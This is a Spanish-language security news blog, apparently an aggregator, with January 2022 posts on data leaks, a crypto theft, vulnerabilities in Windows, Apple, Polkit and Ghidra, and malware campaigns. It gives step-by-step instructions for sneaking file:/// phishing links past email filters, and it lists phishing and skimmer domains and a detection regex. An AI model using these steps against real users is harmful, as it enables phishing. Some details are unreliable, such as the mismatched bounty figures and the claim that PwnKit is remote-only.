lunes, 31 de enero de 2022

Filtran información personal y fotos de los empleados en aeropuertos de Colombia y Perú

Los especialistas en ciberseguridad de SafetyDetectives reportan la detección de una brecha de datos confidenciales que expuso información confidencial de Securitas, una importante firma de vigilancia, seguridad y gestión de riesgos corporativos con sede en Suecia y que presta sus servicios a algunos de los principales exponentes en múltiples industrias a nivel internacional.

Según reportan los expertos, uno de los tres buckets Amazon Simple Storage Service (AS3) de la firma estaba completamente expuesto en línea, lo que resultó en la filtración de más de 1 millón de archivos confidenciales, equivalentes a 3TB. Los investigadores señalan que los datos almacenados parecen pertenecer a los aeropuertos de países latinoamericanos como Colombia y Perú; Securitas es una empresa con gran presencia en América Latina, lo que confirma la legitimidad de la información expuesta.

Si bien la primera hipótesis de los investigadores fue un error de actualización, un análisis posterior demostró que el bucket estaba activo y había recibido las actualizaciones correspondientes, por lo que la responsabilidad de la filtración no fue atribuida a Amazon. Además, poco después los expertos descubrieron más filtraciones relacionadas con Securitas, por lo que se concluyó que el incidente es responsabilidad de la firma de servicios de seguridad.

Sobre la naturaleza de la información comprometida, SafetyDetectives señala que la información expuesta incluye información de identificación personal de los empleados de al menos cuatro aeropuertos en los países mencionados, incluyendo los reconocidos Aeropuerto Internacional El Dorado, en Colombia y el Aeropuerto Internacional Jorge Chávez, en Perú.

Entre los detalles personales expuestos destacan:

  • Nombres completos
  • Fotos de empleados
  • Ocupación/Funciones en la compañía
  • Números de identificación nacional

Además de las fotos de los empleados, el bucket expuesto almacenaba más de 300,000 fotos de aviones, líneas de abastecimiento de combustible, equipaje procesado por el aeropuerto e imágenes de las instalaciones.

Otro importante conjunto de datos almacenados en este bucket corresponde a las tarjetas de identificación de los empleados. La mayoría de estas tarjetas pertenecen a los empleados del Aeropuerto El Dorado, aunque también pueden encontrarse tarjetas de los empleados en otros aeropuertos.

Del mismo modo que en otros incidentes similares, la filtración de información podría resultar muy peligrosa para los empleados de estos aeropuertos. Empleando esta información, los actores de amenazas pueden desplegar sofisticadas campañas de phishing, intentos de fraude de identidad y fraude electrónico, además de que exponer a este nivel la identidad de los empleados de un aeropuerto podría representar un riesgo adicional para las operaciones en estas instalaciones.

Por si fuera poco, es imposible saber con exactitud si algún grupo de hacking logró acceder a esta información antes de que la filtración fuera detectada y el acceso al bucket expuesto revocado.

Finalmente, los expertos mencionan que Securitas podría enfrentar severas sanciones de los gobiernos de Colombia y Perú si sus autoridades determinan que la firma sueca incumplió con las leyes de protección de datos vigentes en estos países.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).  

El cargo Filtran información personal y fotos de los empleados en aeropuertos de Colombia y Perú apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Plataforma de criptomoneda Qubit Finance es hackeada. La compañía ruega a los hackers devolver los activos robados a cambio de $8 millones USD

En días recientes, la plataforma de criptomoneda Qubit Finance confirmó que sus sistemas fueron comprometidos por un grupo de actores de amenazas no identificados. La plataforma, especializada en préstamos descentralizados, incluso ha apelado a la buena voluntad de los ladrones, en una medida desesperada por recuperar los activos perdidos.

El viernes pasado, la compañía reconoció que uno de sus protocolos había sido explotado de forma no intencionada, resultando en la pérdida de unos $80 millones USD en activos virtuales. Este incidente es inusual, ya que el atacante habría usado los protocolos de Qubit, dejando un rastro en el blockchain.

Qubit ya ha comenzado a abordar el incidente. El fin de semana, la compañía implementó un sitio web para ayudar a los usuarios afectados, el cual incluye un registro de todos los fondos comprometidos.

Posteriormente, la compañía ofreció un pago de $2 millones USD a través de su programa  de recompensas para los atacantes, poniendo como condición que devuelvan los activos robados. Esta es la cantidad más alta que se ha ofrecido en el programa de recompensas de la compañía.

Aunque este puede ser un llamado desesperado, los expertos en ciberseguridad creen que la compañía podría tener éxito en su búsqueda, ya que para los hackers podría resultar complicado desvanecer el rastro de los $80 millones USD. Considerando este problema, los hackers bien podrían tomar los $2 millones USD ofrecidos por la compañía.

Además, ya se conocen algunos antecedentes en  los que los hackers devuelven la criptomoneda robada. Un ejemplo es el incidente en Poly Metwork, que sufrió el robo de $600 millones USD solo para después recibir de vuelta los activos robados ya que los atacantes afirmaban que solo querían jugar una broma y evidenciar las falencias de seguridad en la red.

Hasta el momento se desconoce si los atacantes devolverán los activos robados, por lo que tanto la compañía como los usuarios afectados deberán esperar para saber si podrán recuperar la criptomoneda extraída por los hackers.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Plataforma de criptomoneda Qubit Finance es hackeada. La compañía ruega a los hackers devolver los activos robados a cambio de $8 millones USD apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Vulnerabilidad día cero en Windows 10 permite a usuarios locales obtener privilegios de administrador. Código de explotación publicado

Especialistas en ciberseguridad publicaron recientemente un exploit para una vulnerabilidad de escalada de privilegios locales cuya explotación exitosa permitiría a los usuarios maliciosos obtener privilegios de administrador en sistemas Windows 10. Identificada como CVE-2022-21882, la falla fue abordada en el parche de Microsoft para enero de 2022.

Según el reporte, los actores de amenazas locales autenticados podrían obtener privilegios elevados en el sistema objetivo mediante la explotación de esta falla, que reside en el controlador Wink32k.sys. Al respecto, la firma de ciberseguridad RyeLv publicó un análisis detallado para confirmar que la vulnerabilidad afecta a todas las versiones de Windows 10 que siguen recibiendo soporte.

Para los hackers maliciosos, basta con un acceso limitado a un dispositivo vulnerable para elevar fácilmente sus privilegios y eventualmente desplazarse lateralmente en la red afectada, creando nuevos usuarios administrativos o ejecutando comandos con privilegios elevados.

“Los atacantes pueden interceptar la devolución de llamada xxxClientAllocWindowClassExtraBytes a través del enlace xxxClientAllocWindowClassExtraBytes en KernelCallbackTable, usando el método NtUserConsoleControl para configurar el indicador ConsoleWindow del objeto tagWND, que modificará el tipo de ventana”, mencionan los expertos.

Después de la devolución de llamada final, el sistema no verifica si el tipo de ventana ha cambiado y se hace referencia a datos incorrectos debido a una confusión de tipos. La diferencia antes y después de la modificación del indicador es que antes de establecer el indicador, el sistema piensa que tagWND.WndExtra guarda un puntero de user_mode. Una vez que se establece el indicador, el sistema piensa que tagWND.WndExtra es el desplazamiento del almacenamiento dinámico del escritorio del kernel, y el atacante puede controlar este desplazamiento y luego causar una lectura y escritura fuera de límites.

Poco después, otros miembros de la comunidad de la ciberseguridad, incluyendo al reconocido analista Will Dormann confirmaron los hallazgos de RyeLv.

Como medida de seguridad, se recomienda a los administradores de versiones vulnerables aplicar las últimas actualizaciones de Windows lo antes posible para mitigar el riesgo de explotación. Por el momento se desconoce la existencia de soluciones alternativas funcionales.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Vulnerabilidad día cero en Windows 10 permite a usuarios locales obtener privilegios de administrador. Código de explotación publicado apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

viernes, 28 de enero de 2022

CVE-2020-0696 Nueva vulnerabilidad permite evadir seguridad de Office 365 usando un simple email de spear phishing

Especialistas en ciberseguridad de Trustwave reportan la detección de múltiples emails de phishing capaces de evadir algunos mecanismos de protección empleando un método novedoso que no requiere de tácticas de evasión. Este ataque depende de la explotación de la vulnerabilidad identificada como CVE-2020-0696.

Según el reporte, el problema existe debido a la traducción incorrecta de hipervínculos en ”Microsoft Outlook para Mac”, un proceso que conduce a la evasión completa de los sistemas de seguridad email en el sistema afectado para enviar al usuario objetivo un enlace malicioso que desencadenará la etapa final de ataque. En sus pruebas, los expertos usaron el vector vulnerable: http://trustwave.com con archivo hipervinculado:///malciouslink

Después de enviar el vector anterior con el archivo de hipervínculo: ///trustwave.com, el correo electrónico se entrega en el “Microsoft Outlook para Windows” de la víctima como archivo: ///trustwave.com. El enlace file:///trustwave.com luego se traduce a http://trustwave.com después de hacer clic.

En el proceso de transmisión del remitente al receptor, ningún sistema de seguridad email pudo reconocer el enlace file:///trustwave.com, que se entrega a la víctima como un enlace en el que se puede hacer clic. La prueba inicial se realizó en la característica de seguridad de Microsoft M365 “Protección Safelink”. Más tarde, esta acción fue verificada en otros sistemas de seguridad email.

En su reporte, los expertos detallan la cadena de eventos que lleva al ataque exitoso:

  • Crear un nuevo email desde ”Microsoft Outlook para Mac”
  • Escriba una URL http://enlace legítimo
  • Agregar el hipervínculo con file:///malciouslink
  • Enviar
  • Hecho esto, el email evadirá con éxito los mecanismos de protección y aparecerá como “Microsoft Outlook para Windows”
  • Al hacer clic en el enlace recibido; el hipervínculo será como file:///maliciouslink
  • Una vez que la víctima hace clic, la traducción de file:/// a http:// será manejada por “Outlook para Windows” y abrirá el enlace

Con los datos recopilados hasta este momento, los investigadores concluyeron que el ataque solo funciona en “Microsoft Outlook para Mac” siempre y cuando la víctima sea “Microsoft Outlook para Windows”. Dado que las detecciones de los sistemas de seguridad email se basan en firmas de URL, detonación de Sandbox, reputación y patrones basados en ML, el enlace creado file:///trustwave.com no se considera un enlace para el análisis.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo CVE-2020-0696 Nueva vulnerabilidad permite evadir seguridad de Office 365 usando un simple email de spear phishing apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Nueva técnica de phishing agrega un dispositivo malicioso a las redes de la organización afectada usando emails maliciosos

Esta semana, los equipos de seguridad de Microsoft reportaron el hallazgo de una campaña de phishing caracterizada por la inclusión de una novedosa técnica que consiste en unir un dispositivo malicioso a la red de la organización afectada, tratando de extender la infección. Esta campaña fue detectada en países como Australia, Indonesia, Singapur y Tailandia.

El ciberataque se divide en dos etapas principales. En la primera etapa, los atacantes roban las credenciales de usuarios expuestos en las organizaciones afectadas para posteriormente acceder a las redes comprometidas y expandir sus actividades de hacking más allá del alcance del email malicioso.

Según Microsoft, la conexión de un dispositivo malicioso permite a los actores de amenazas propagar el ataque de forma muy discreta, lo que los expertos ya consideran una tendencia creciente en el cibercrimen. Los investigadores también mencionan que el ataque funciona mejor contra las organizaciones que no usan autenticación multifactor, pues basta con conocer las contraseñas de usuarios para completar la intrusión.

Al parecer, todo comienza cuando los usuarios afectados reciben un email de phishing con la marca DocuSign, como se muestra en la siguiente captura de pantalla:

Los actores de amenazas emplearon un conjunto de dominios de phishing registrados bajo el dominio de nivel superior .xyz. Este dominio URL se puede describir con la siguiente sintaxis de expresiones regulares:

UrlDomain matches regex @”^[a-z]{5}\.ar[a-z]{4,5}\.xyz”

En este punto se genera un enlace de phishing único para cada email, con la dirección email de la víctima codificada en el parámetro de consulta de la URL. Después de hacer clic en el enlace, el usuario objetivo será redirigido a un sitio web de phishing en newdoc-lnpye.ondigitalocean.app que se hacía pasar por una página de inicio de sesión de Office 365.

Cuando los hackers obtienen las credenciales del usuario objetivo, las usarán para establecer una conexión con Exchange Online PowerShell. Esta conexión remota permite a los atacantes establecer una regla de bandeja de entrada a través de cmdlet New-InboxRule, eliminando ciertos mensajes en función de algunas palabras clave; la regla de bandeja de entrada arbitraria permite a los hackers evitar la detección eliminando los informes de errores, alertas de spam y ataques de phishing.

En un ejemplo de esta campaña, la creación de la regla de bandeja de entrada en la organización afectada eventualmente llevó al compromiso de cuentas adicionales mediante el envío de emails de phishing laterales, internos y salientes. La conexión del dispositivo malicioso también permitió a los hackers enviar emails dentro de la organización sin que nadie pudiera detectar un solo indicio de actividad sospechosa, consiguiendo desplegar un ataque de amplio rango.

En este caso, los atacantes usaron la bandeja de entrada comprometida para enviar mensajes de phishing a más de 8,500 cuentas email dentro y fuera de la organización afectada. Estos mensajes se asemejan a cualquier otra campaña de emails maliciosos.

Este es un nuevo ejemplo de lo importante que es habilitar mecanismos de autenticación multifactor como medida de protección estandarizada, ya que el éxito de un ataque como este depende en gran medida de la ausencia de estas protecciones.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Nueva técnica de phishing agrega un dispositivo malicioso a las redes de la organización afectada usando emails maliciosos apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

jueves, 27 de enero de 2022

Vulnerabilidad de ejecución remota de código en Ghidra, la herramienta de ingeniería inversa de la NSA

Especialistas en ciberseguridad reportan la detección de una vulnerabilidad crítica en Ghidra, una herramienta de ingeniería inversa gratuita y de código abierto desarrollada por la Agencia de Seguridad Nacional de E.U. (NSA).

Identificada como CVE-2021-44832, la falla existe debido a una validación de entrada incorrecta en la aplicación, lo que permitiría a los usuarios remotos con permiso para modificar el archivo de configuración de registro construir una configuración maliciosa utilizando un Appender JDBC con una fuente de datos que hace referencia a un URI JNDI, conduciendo a la ejecución remota de código (RCE).

La falla recibió un puntaje de 5.8/10 según el Common Vulnerability Scoring System (CVSS) y su explotación exitosa podría poner en riesgo todo el sistema expuesto.

Según el reporte, la falla reside en las siguientes versiones de Ghidra: 10.0, 10.0.1, 10.0.2, 10.0.3, 10.0.4, 10.1 y 10.1.1.

Si bien la falla puede ser explotada por actores de amenazas remotos y autenticados con altos privilegios, los expertos en ciberseguridad no han detectado intentos de explotación activa. Aún así, se recomienda a los usuarios de implementaciones afectadas actualizar su versión de Ghidra a la brevedad.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Vulnerabilidad de ejecución remota de código en Ghidra, la herramienta de ingeniería inversa de la NSA apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

2 vulnerabilidades de día cero en iPhone y Mac ya tienen parches. Actualice ahora

Esta semana, Apple anunció el lanzamiento de 23 parches de seguridad para abordar errores críticos en iOS/iPadOS y macOS, incluyendo dos vulnerabilidades día cero que ya podrían haber sido explotadas en escenarios reales.

La primera de estas fallas, identificada como CVE-2022-22587, fue descrita como un problema de corrupción de memoria que permitiría la ejecución de código arbitrario con privilegios de kernel. El problema reside en IOMobileFrameBuffer, una extensión del kernel que permite a los desarrolladores controlar cómo la memoria de un dispositivo maneja la visualización de la pantalla, también conocido como framebuffer.

Esta falla afecta a iOS, iPadOS y macOS Monterey. La actualización está disponible para iPhone 6s y posteriores, iPad Pro, iPad Air 2 y posteriores, iPad de quinta generación y posteriores, iPad mini 4 y posteriores, y la séptima generación de iPod Touch.

La segunda falla día cero, identificada como CVE-2022-22594, es un error de WebKit en el navegador Safari que podría llevar a un escenario de divulgación de información en sistemas iOS, iPadOS y macOS. La explotación exitosa permitiría usar un sitio web malicioso para rastrear información en otras pestañas abiertas en el mismo navegador.

Este ataque representa una violación de la política de origen cruzado en la API de IndexDB, una API de JavaScript proporcionada por los navegadores web para administrar una base de datos NoSQL de objetos JSON. Generalmente, un navegador web permite que las secuencias de comandos de una página web accedan a los datos de una segunda página web solo si ambas páginas tienen el mismo servidor de origen/back-end. Sin esta política de seguridad, los actores de amenazas podrían inyectar scripts maliciosos en sitios web para acceder a cualquier información en otras pestañas del usuario, sin importar que dichas ventanas contengan detalles confidenciales.

Los parches están disponibles en las actualizaciones de iOS/iPadOS 15.3 y macOS Monterey 12.2; iOS 15.3 también cuenta con parches para una serie de fallas que podrían llevar a que las aplicaciones obtengan privilegios de root, la capacidad de ejecutar código arbitrario con privilegios de kernel y la capacidad de las aplicaciones para acceder a los archivos de los usuarios a través de iCloud.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo 2 vulnerabilidades de día cero en iPhone y Mac ya tienen parches. Actualice ahora apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Código de la botnet BotenaGo es publicado en GitHub. Millones de empresas en riesgo de ataque DDoS

A finales de 2021, un equipo de seguridad de AT&T publicó una investigación sobre una nueva variante de malware escrita en Golang, un popular lenguaje de programación de código abierto. El código fuente de este malware, conocido como BotenaGo, fue recientemente publicado en GitHub, por lo que los expertos temen que comience una nueva oleada de ataques empleando este desarrollo malicioso, principalmente mediante el uso de botnets capaces de comprometer dispositivos de Internet de las Cosas (IoT) a nivel mundial.

Los investigadores detectaron que el código fuente de BotenaGo ha estado disponible en el repositorio desde el 16 de octubre de 2021, permitiendo a cualquier hacker malicioso usarlo, modificarlo y actualizarlo para el despliegue de sus propias campañas de ataque, principalmente ataques de denegación de servicio (DoS) contra dispositivos IoT. El repositorio que almacena este código también incluye algunas herramientas de hacking compatibles con BotenaGo.

Según el reporte, el código fuente del malware está compuesto por 2891 líneas de código, además de contar con decenas de líneas vacías y comentarios de los desarrolladores. En opinión de los expertos de AT&T, este es un malware simple pero efectivo que cuenta con todas las herramientas necesarias para realizar un ataque, incluyendo:

  • Shell inverso y cargador telnet, para la implementación de un backdoor encargado de recibir comandos C&C
  • Configuración automática de los 33 exploits del malware, dejando a los hackers con todo listo para atacar al sistema afectado e infectarlo con una carga útil adecuada según las características del sistema

Como se muestra a continuación, la parte superior del código fuente muestra un comentario con la lista de exploits compatibles con BotenaGo:

Este malware es capaz de ejecutar 33 funciones de explotación dirigidas a diferentes enrutadores y dispositivos IoT llamando a la función scannerInitExploits:

Cada función maliciosa contiene la configuración de explotación y una carga útil específica para el sistema afectado. Algunos exploits son una cadena de comandos, como múltiples solicitudes “GET”:

En esta captura de pantalla, podemos ver la explotación de CVE-2020-10987.

Además, el código contiene una configuración adicional para un servidor remoto, cargas útiles disponibles y una ruta a las carpetas que contienen archivos de secuencias de scripts adicionales para su ejecución en los dispositivos infectados.

Ante el riesgo de ataque, los investigadores emitieron una lista de recomendaciones que deberían mitigar el impacto de este malware:

  • Mantener una exposición mínima a Internet en servidores Linux y dispositivos IoT
  • Usar un firewall configurado correctamente
  • Instalar actualizaciones de seguridad y firmware tan pronto como sea posible
  • Verificar su sistema para detectar puertos abiertos innecesarios y procesos sospechosos

Como se menciona anteriormente, la disponibilidad de este código puede convertirse en un serio problema para los usuarios de dispositivos IoT, ya sea en entornos domésticos, empresariales e industriales. Además del riesgo de ataques DoS, el código fuente podría resultar útil para el desarrollo de otras variantes de malware, extendiendo aún más el problema.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Código de la botnet BotenaGo es publicado en GitHub. Millones de empresas en riesgo de ataque DDoS apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

miércoles, 26 de enero de 2022

Hackean sitio web de Segway y roban datos confidenciales de los clientes

Desde la primera década del nuevo siglo, el Segway Human Transporter se convirtió en uno de los productos más populares en Amazon y una nueva referencia a la cultura popular. Desde 2015, Segway se convirtió en una subsidiaria de la empresa china Ninebot, por lo que sus scooters eléctricos ahora se venden como una subsidiaria de la firma asiática hasta que a mediados de 2020 se interrumpió la producción de estas máquinas, aunque aún están disponibles para su venta.

Siendo parte de una gran compañía, el sitio web de ventas de Segway no está exento de intentos de ciberataque. Un reciente reporte de Malwarebytes señala la detección de un avanzado skimmer en la sección de tienda online de la plataforma, en una operación presuntamente desplegada por Magecart Group.

El equipo de Malwarebytes identificó una conexión a un dominio de skimmer conocido (booctstrap.com) cargado por la tienda Segway. Este dominio fue activado en noviembre de 2021 y está conectado a una campaña previamente documentada. El nombre de host en store.segway.com ejecuta Magento, un popular sistema de administración de contenido (CMS) empleado en ocasiones anteriores por Magecart; los expertos creen que los hackers comprometieron la plataforma explotando una vulnerabilidad en Magento.

FUENTE: Malwarebytes

Aunque los expertos habían estado bloqueando el dominio malicioso desde el año pasado, esta plataforma habría sido comprometida desde el 6 de enero. Los datos de telemetría de Magecart mostraron que la cantidad de ataques evitados contra sus clientes también incrementó desde inicios de 2022.

Esta amenaza ha estado activa principalmente en Australia, Canadá, Reino Unido y Alemania, aunque más del 50% de los casos han sido detectados en Estados Unidos.

En la investigación, los expertos detectaron una pieza de JavaScript disfrazada de “Copyright”, responsable de cargar dinámicamente el skimmer de modo que pase desapercibido al mirar el código fuente HTML.

Para analizar la muestra maliciosa, los investigadores verificaron el código a través del depurador del navegador, evidenciando la construcción de la URL:

FUENTE: Malwarebytes

Los hackers incrustan el skimmer dentro de un archivo favicon.ico, el cual no puede ser tomado como indicador de actividad maliciosa. No obstante, al analizar el archivo con un editor hexadecimal es posible apreciar que contiene JavaScript que comienza con una función eval.

FUENTE: Malwarebytes

Este skimmer ha sido utilizado desde hace años por diversas operaciones de hacking conocidas, por lo que más que caracterizarse por su capacidad de evasión, los hackers deben arreglárselas para ocultar su actividad maliciosa, lo que distingue esta campaña de otras que usan la misma herramienta de hacking. El problema fue reportado a Segway, que abordó inmediatamente cualquier posible error.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Hackean sitio web de Segway y roban datos confidenciales de los clientes apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Nueva vulnerabilidad de escalada de privilegios en Linux afecta a millones de servidores Ubuntu, Debian, Fedora y CentOS en todo el mundo. Exploit disponible

Especialistas en ciberseguridad reportan la detección de una vulnerabilidad crítica en el componente pkexec de Polkit cuya explotación permitiría obtener privilegios de usuario root en las principales distribuciones de Linux. Identificada como CVE-2021-4034, la falla solo puede ser explotada de forma remota, lo que reduce el riesgo de ataque.

Apodada “PwnKit”, la falla existe desde hace unos 12 años, por lo que todas las versiones de pkxec se ven afectadas. Polkit, el componente afectado, se encarga de controlar los privilegios en sistemas operativos similares a Unix, permitiendo que procesos no privilegiados se comuniquen con procesos privilegiados. El componente también permite ejecutar comandos con privilegios elevados utilizando el comando pkexec.

Este informe, publicado por la firma de seguridad Qualys señaló la detección de una vulnerabilidad de corrupción de memoria en Polkit: “La explotación exitosa de esta vulnerabilidad permite que cualquier usuario sin privilegios obtenga privilegios root en el host expuesto. Este grupo de investigación ha podido Los investigadores de seguridad de Qualys han podido identificar la falla, desarrollar un exploit y obtener privilegios root en las instalaciones predeterminadas de Ubuntu, Debian, Fedora y CentOS; otras distribuciones de Linux son potencialmente vulnerables”, señala Qualys.

Si bien Qualys no compartió su exploit de prueba de concepto (PoC) por razones de seguridad, apenas un par de horas después de la publicación de su reporte se reveló un exploit completamente funcional para el abuso de esta vulnerabilidad.

Ante esta situación, y considerando que no hay parches disponibles para todas las distribuciones de Linux afectadas, los investigadores recomiendan eliminar SUID-bit de pkexec para mitigar temporalmente el riesgo de explotación, además de verificar las recomendaciones de seguridad emitidas por los autores de Polkit.

Al momento de redacción de este artículo, algunas distribuciones ya habían abordado el problema, por lo que la comunidad de la ciberseguridad espera que las  distribuciones de Linux restantes publiquen paquetes pkexec actualizados durante los próximos días, mitigando completamente el riesgo de explotación.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Nueva vulnerabilidad de escalada de privilegios en Linux afecta a millones de servidores Ubuntu, Debian, Fedora y CentOS en todo el mundo. Exploit disponible apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Nueva vulnerabilidad en Mac brinda acceso completo a cuentas de iCloud, PayPal y más de los usuarios afectados, además de otorgar acceso a su micrófono, cámara y pantalla. La mayor recompensa jamás entregada por Apple

Esta semana, un joven investigador de ciberseguridad demostró cómo hackear las cámaras web de dispositivos Mac para dejar los dispositivos completamente abiertos a otras variantes de ataque. Ryan Pickren presentó su informe a Apple a través de su programa de recompensas, ganando $100,500 USD por su reporte, la recompensa más grande que ha entregado la compañía.

El joven investigador menciona que la vulnerabilidad en las cámaras web existe debido a un conjunto de problemas en iCloud y Safari que los actores de amenazas podrían explotar para lanzar peligrosos ciberataques.

La explotación exitosa habría permitido a los hackers maliciosos acceder libremente a todas las cuentas en línea del usuario afectado, desde iCloud hasta PayPal, además de la capacidad de manipular el micrófono, cámara web y pantalla del dispositivo comprometido. Pickren mencionó que Apple ya ha abordado la falla.

En sus pruebas, el investigador explotó los archivos “webarchive” de Safari, el sistema que utiliza el navegador para guardar copias locales de sitios web: “Una característica sorprendente de estos archivos es que especifican el origen web en el que se debe representar el contenido. El hack permite que Safari reconstruya el contexto del sitio web guardado; si un atacante puede modificar este archivo de alguna manera, podría desplegar un ataque de scripts entre sitios universal (XSS)”, menciona.

Al inicio, Apple no consideraba que este error pudiera ser explotado, ya que los usuarios tendrían que descargar el webarchive y abrirlo, un mecanismo implementado desde hace más de una década, en una etapa temprana de Safari. No obstante, Apple ha debido abordar la falla después de que Pickren presentara su reporte, reconociendo el potencial de explotación.

Oficialmente, el programa de recompensas de Apple puede otorgar hasta $1 millón USD por los reportes sobre fallas más severas, clasificando estos errores según diversos criterios de la compañía. Los investigadores no están obligados a revelar públicamente cuánto dinero han recibido de Apple, aunque esta práctica se ha vuelto común en la comunidad de la ciberseguridad.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Nueva vulnerabilidad en Mac brinda acceso completo a cuentas de iCloud, PayPal y más de los usuarios afectados, además de otorgar acceso a su micrófono, cámara y pantalla. La mayor recompensa jamás entregada por Apple apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

martes, 25 de enero de 2022

Dos vulnerabilidades en Foxit PDF Reader & Foxit Editor para Mac

Especialistas en ciberseguridad reportan la detección de dos vulnerabilidades críticas en Foxit PDF Reader y Foxit Editor para Mac, un par de populares herramientas de lector PDF. Acorde al reporte, la explotación exitosa de las fallas reportadas permitiría el despliegue de diversos escenarios de ataque.

A continuación se presentan breves reportes de las fallas detectadas, además de sus respectivos puntajes asignados según el Common Vulnerability Scoring System (CVSS). Cabe señalar que estas fallas no han recibido clave de identificación CVE.

Sin clave CVE: Esta falla existe debido a una condición de límite al manejar el atributo de ancho de cierto widget XFA. Los actores de amenazas remotos pueden crear un archivo PDF especialmente diseñado que, al ser entregado a la víctima, desencadenará el error de lectura fuera de límites y permitirá a los hackers acceder al contenido en la memoria del sistema.

Esta es una falla de severidad media y recibió un puntaje CVSS de 3.7/10.

Sin clave CVE: Por otra parte, una condición de límite en el sistema afectado permitiría a los actores de amenazas remotos crear un archivo PDF especialmente diseñado para engañar a las víctimas y desencadenar un error de lectura fuera de límites.

La falla recibió un puntaje CVSS de 7.7/10 y su explotación exitosa habría permitido el compromiso total del sistema afectado.

Según el reporte, las fallas residen en los siguientes productos y versiones:  

  • Foxit PDF Editor para Mac: 11.0.1.0719, 11.0.1.0917, 11.1.0.0925
  • Foxit Reader para Mac: 11.0.0.0510, 11.0.1.0719, 11.1.0.0925

Si bien las vulnerabilidades pueden ser explotadas por actores de amenazas no autenticados, hasta el momento no se han detectado intentos de explotación activa. Aún así, se invita a los usuarios de implementaciones afectadas a instalar los parches de seguridad disponibles.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Dos vulnerabilidades en Foxit PDF Reader & Foxit Editor para Mac apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Hackers instalan un backdoor en casi 100 plantillas y plugins AccessPress Themes para WordPress. Elimine estas plantillas y plugins

Investigadores de Jetpack reportan la detección de una muestra de código sospechosa en un tema de AccessPress Themes, una firma dedicada a la creación de temas y plugins para WordPress. Un análisis más detallado reveló que todos los temas y plugins de este desarrollador podrían contener este código sospechoso siempre y cuando sean descargados desde el sitio web de AccessPress.

En su reporte, los investigadores mencionan que es altamente probable que un grupo de actores de amenazas haya logrado comprometer el sitio web de la firma para tratar de infectar más sitios web mediante sus extensiones. Poco después se confirmó que, en septiembre de 2021, los sitios web de AccessPress Themes fueron atacados y que las extensiones disponibles para descargar en su sitio fueron inyectadas usando un backdoor.

El proveedor ya ha recibido los reportes sobre este problema y actualizado la mayoría de plugins y temas vulnerables. No obstante, los temas afectados no se han actualizado y pueden extraerse del repositorio de temas de WordPress.org. A continuación se presenta una lista de los temas y plugins vulnerables:

TEMAS:

PLUGINS:

Se recomienda a los usuarios de temas y plugins de AccessPress Themes descargados desde la plataforma oficial de la compañía, o desde cualquier otra plataforma que no sea WordPress.org, actualizar a las versiones seguras de estos productos. En caso de que no haya parches disponibles, los expertos recomiendan deshabilitar el plugin o tema, al menos de manera temporal.

Por sí mismas, estas medidas de seguridad no eliminarán el backdoor de sus sistemas, por lo que también es recomendable reinstalar su implementación de WordPress, garantizando así el uso de una versión segura del sistema de gestión de contenidos (CMS).

Para los usuarios de plugins o temas de pago, se recomienda pedir ayuda a los equipos de soporte de AccessPress Themes. Este es un recordatorio para los administradores de sitios web en WordPress, que nunca deben bajar la guardia y descuidar sus medidas de seguridad para prevenir los ataques.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Hackers instalan un backdoor en casi 100 plantillas y plugins AccessPress Themes para WordPress. Elimine estas plantillas y plugins apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Estas direcciones IP hexadecimales y octales pueden evadir los mecanismos antimalware. Bloquee para evitar ser hackeado por el malware Emotet

